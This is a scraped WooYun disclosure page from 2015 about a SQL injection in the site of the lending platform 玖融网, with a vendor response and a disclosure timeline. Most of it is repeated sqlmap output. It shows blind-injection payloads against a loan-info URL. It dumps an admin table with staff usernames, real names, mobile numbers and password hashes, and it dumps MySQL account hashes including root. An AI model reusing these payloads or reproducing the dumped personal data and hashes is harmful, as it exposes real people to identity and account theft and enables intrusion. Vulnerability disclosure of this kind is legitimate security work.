玖融网主站某处SQL注入漏洞 | wooyun-2015-0132486| WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞标题：玖融网主站某处SQL注入漏洞

提交时间：2015-08-13 09:49

修复时间：2015-09-28 17:28

公开时间：2015-09-28 17:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-13：细节已通知厂商并且等待厂商处理中
2015-08-14： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-08-24：细节向核心白帽子及相关领域专家公开
2015-09-03：细节向普通白帽子公开
2015-09-13：细节向实习白帽子公开
2015-09-28：细节向公众公开

简要描述：

忘带安全啊！！！

详细说明：

https://**.**.**.**/loan/loanInfo/id/11449* (GET)

伪静态
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
available databases [7]:
[*] information_schema
[*] j_bbs
[*] j_oa
[*] j_session
[*] j_site
[*] j_uc
[*] mysql
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
Database: j_site
Table: d_admin
[9 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| groupid | smallint(3) |
| id | int(11) |
| loginip | varchar(100) |
| logintime | int(11) |
| mobile | varchar(11) |
| password | varchar(100) |
| status | tinyint(2) |
| tname | varchar(100) |
| uname | varchar(100) |
+-----------+--------------+
Database: j_site
Table: d_admin
[9 entries]
+----+---------+--------------+-------------+--------+-------------+---------+----------------------------------+-----------+
| id | groupid | uname | tname | status | mobile | loginip | password | logintime |
+----+---------+--------------+-------------+--------+-------------+---------+----------------------------------+-----------+
| 1 | 1 | baihuopu | baihuopu | 1 | 2147483647 | NULL | 614c21083bf012b639b751d757801c29 | NULL |
| 3 | 1 | 96cfxuben | 徐奔 | 1 | 18627131553 | NULL | 38b14cc5cf69d15ce87f5049cfe7df96 | NULL |
| 4 | 3 | 96cflipinlan | 李品兰 | 1 | 13971180981 | NULL | d5b359e04970a92f4f4a94588c0a9ac8 | NULL |
| 5 | 1 | jiurongceo | 王总 | 1 | 13545147988 | NULL | 9656875778812c916d7f519a51f3da71 | NULL |
| 7 | 1 | 96cfchengru | \\?ff\\?f0汝 | 1 | 13986267347 | NULL | 5b100ff2d31a4c2df1c900631d1cf832 | NULL |
| 9 | 2 | kefu | 客服 | 1 | 18507100909 | NULL | ca89dc52bd44220b44a081e4fca462b1 | NULL |
| 11 | 4 | jrwzhangjun | 张俊 | 1 | 18507100900 | NULL | ca89dc52bd44220b44a081e4fca462b1 | NULL |
| 13 | 1 | 96guojie | 郭杰 | 1 | 1 | NULL | 0905ebdece1965ba348c771d4c663345 | NULL |
| 15 | 1 | 13352271912 | 候斌 | 1 | 13352271912 | NULL | 38b14cc5cf69d15ce87f5049cfe7df96 | NULL |
+----+---------+--------------+-------------+--------+-------------+---------+----------------------------------+-----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
Database: j_site
Table: d_admin
[9 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| groupid | smallint(3) |
| id | int(11) |
| loginip | varchar(100) |
| logintime | int(11) |
| mobile | varchar(11) |
| password | varchar(100) |
| status | tinyint(2) |
| tname | varchar(100) |
| uname | varchar(100) |
+-----------+--------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
Database: j_site
Table: d_admin
[9 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| groupid | smallint(3) |
| id | int(11) |
| loginip | varchar(100) |
| logintime | int(11) |
| mobile | varchar(11) |
| password | varchar(100) |
| status | tinyint(2) |
| tname | varchar(100) |
| uname | varchar(100) |
+-----------+--------------+
Database: j_site
Table: d_admin
[9 entries]
+----+---------+--------------+-----------+--------+-------------+---------+----------------------------------+-----------+
| id | groupid | uname | tname | status | mobile | loginip | password | logintime |
+----+---------+--------------+-----------+--------+-------------+---------+----------------------------------+-----------+
| 1 | 1 | baihuopu | baihuopu | 1 | 2147483647 | NULL | 614c21083bf012b639b751d757801c29 | NULL |
| 3 | 1 | 96cfxuben | 徐奔 | 1 | 18627131553 | NULL | 38b14cc5cf69d15ce87f5049cfe7df96 | NULL |
| 4 | 3 | 96cflipinlan | 李品兰 | 1 | 13971180981 | NULL | d5b359e04970a92f4f4a94588c0a9ac8 | NULL |
| 5 | 1 | jiurongceo | 王总 | 1 | 13545147988 | NULL | 9656875778812c916d7f519a51f3da71 | NULL |
| 7 | 1 | 96cfchengru | \?ff\?f0汝 | 1 | 13986267347 | NULL | 5b100ff2d31a4c2df1c900631d1cf832 | NULL |
| 9 | 2 | kefu | 客服 | 1 | 18507100909 | NULL | ca89dc52bd44220b44a081e4fca462b1 | NULL |
| 11 | 4 | jrwzhangjun | 张俊 | 1 | 18507100900 | NULL | ca89dc52bd44220b44a081e4fca462b1 | NULL |
| 13 | 1 | 96guojie | 郭杰 | 1 | 1 | NULL | 0905ebdece1965ba348c771d4c663345 | NULL |
| 15 | 1 | 13352271912 | 候斌 | 1 | 13352271912 | NULL | 38b14cc5cf69d15ce87f5049cfe7df96 | NULL |
+----+---------+--------------+-----------+--------+-------------+---------+----------------------------------+-----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
current user: '[email protected].%'
current user is DBA: False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
database management system users password hashes:
[*] jiurong [1]:
password hash: *9A410775C1D8FFBC36A627D2B344D9B66AB2391A
[*] root [1]:
password hash: *650282E78C86D2233883DF5B59E9DD640BC156BC
[*] slaveroot [1]:
password hash: *978E3885B0036AD8EA2B7565855@6776B8A43B4A
[*] wangliang [1]:
password hash: *381AB020957F8374AF7F329280B5E1B2CEED097F
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: MySQL 5.0.12
database management system users password hashes:
[*] jiurong [1]:
password hash: *9A410775C1D8FFBC36A627D2B344D9B66AB2391A
[*] root [1]:
password hash: *650282E78C86D2233883DF5B59E9DD640BC156BC
[*] slaveroot [1]:
password hash: *978E3885B0036AD8EA2B7565855@6776B8A43B4A
[*] wangliang [1]:
password hash: *381AB020957F8374AF7F329280B5E1B2CEED097F
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND 1918=1918 AND (2316=2316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: https://**.**.**.**:443/loan/loanInfo/id/11449) AND (SELECT * FROM (SELECT(SLEEP(5)))wZnh) AND (2871=2871
---
back-end DBMS: mysql

漏洞证明：

https://**.**.**.**/loan/loanInfo/id/11449* (GET)

修复方案：

版权声明：转载请注明来源李叫兽就四李叫兽@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-08-14 17:27

厂商回复：

CNVD确认所述情况，已由CNVD通过网站管理方公开联系渠道向其邮件通报，由其后续提供解决方案并协调相关用户单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0132486

漏洞标题：玖融网主站某处SQL注入漏洞

相关厂商：玖融网

漏洞作者：李叫兽就四李叫兽

提交时间：2015-08-13 09:49

修复时间：2015-09-28 17:28

公开时间：2015-09-28 17:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源李叫兽就四李叫兽@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0132486

漏洞标题：玖融网主站某处SQL注入漏洞

相关厂商：玖融网

漏洞作者： 李叫兽就四李叫兽

提交时间：2015-08-13 09:49

修复时间：2015-09-28 17:28

公开时间：2015-09-28 17:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0132486"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 李叫兽就四李叫兽@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：李叫兽就四李叫兽

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源李叫兽就四李叫兽@乌云